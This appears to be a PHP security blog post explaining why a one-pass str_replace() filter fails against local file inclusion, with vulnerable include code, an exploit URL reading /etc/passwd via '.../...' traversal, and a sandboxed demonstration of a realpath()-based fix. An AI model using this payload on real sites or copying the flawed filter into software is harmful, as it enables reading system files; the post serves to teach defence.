
str_replace isn’t recursive

It's funny how some people couldn't bend their minds around this exploit challenge. Well, if you don't know how the function works, it's hard to see. But as the post title already says, str_replace() isn't recursive: it makes a single pass over the input and never rescans its own output, so it isn't always safe as a filter.

When protecting against local file inclusion (LFI), a programmer sometimes tries to block access to parent directories by using:

    function removeDouble($str)
    {
        return str_replace('..','.',$str);
    }

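Assuming there are only two dots in $str, this would work, but the moment you enter "..." and pass it through the function, you get "..": the first two dots are replaced by one, the third dot is left untouched, and the result is not scanned again. That is excellent for reaching higher directories from the PHP script.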

Example:

    <?php
    function removeDouble($str)
    {
        return str_replace('..','.',$str);
    }
    if(file_exists('./'.removeDouble($_GET['page'])))
    {
        include('./'.removeDouble($_GET['page']));
    }
    ?>

Exploit: index.php?page=.../.../etc/passwd
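
An added example (not code from the original post): it runs the post's filter over constructed inputs and compares the post's file_exists() check with a containment check built on realpath(). The helper name resolvePage() and the temporary directory layout are hypothetical, and PHP 7.1 or later is assumed.

```php
<?php
// The filter from the post, unchanged: one left-to-right pass, output is not rescanned.
function removeDouble($str)
{
    return str_replace('..', '.', $str);
}

// Hypothetical replacement: canonicalise first, then require the result to sit under $baseDir.
function resolvePage(string $baseDir, string $page): ?string
{
    if ($page === '' || strpos($page, "\0") !== false) {
        return null;                       // empty input or embedded NUL byte
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "." and "..", follows symlinks, and returns false for missing paths.
    $full = realpath($base . DIRECTORY_SEPARATOR . $page);
    if ($full === false || !is_file($full)) {
        return null;
    }
    // Compare against base + separator so "/srv/pages_old" cannot pass for "/srv/pages".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($full, $prefix, strlen($prefix)) === 0 ? $full : null;
}

// Constructed sandbox: <tmp>/demo_xxx/site/pages/home.php plus a file two levels above pages/.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'demo_' . bin2hex(random_bytes(4));
mkdir($root . '/site/pages', 0700, true);
file_put_contents($root . '/site/pages/home.php', '<?php echo "home\n";');
file_put_contents($root . '/outside.txt', 'not a page');
$pages = $root . '/site/pages';

// Both checks are given the filter's output, so the columns are directly comparable.
foreach (['home.php', '../../outside.txt', '.../.../outside.txt'] as $input) {
    $filtered = removeDouble($input);
    $oldCheck = file_exists($pages . '/' . $filtered);      // the check used in the post
    $newCheck = resolvePage($pages, $filtered) !== null;    // containment check
    printf("%-22s -> %-20s old:%s new:%s\n", $input, $filtered,
        $oldCheck ? 'include' : 'skip', $newCheck ? 'include' : 'skip');
}
```

Where the set of pages is fixed, mapping the parameter to a known list of file names avoids building a path from user input at all.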

Iron PHP, Programming, Security

  1. July 5th, 2008 at 12:34 | #1

    I succeeded in this part of the exploit challenge with my bad programming/hacking skills by using a bit of logical thinking ;-)
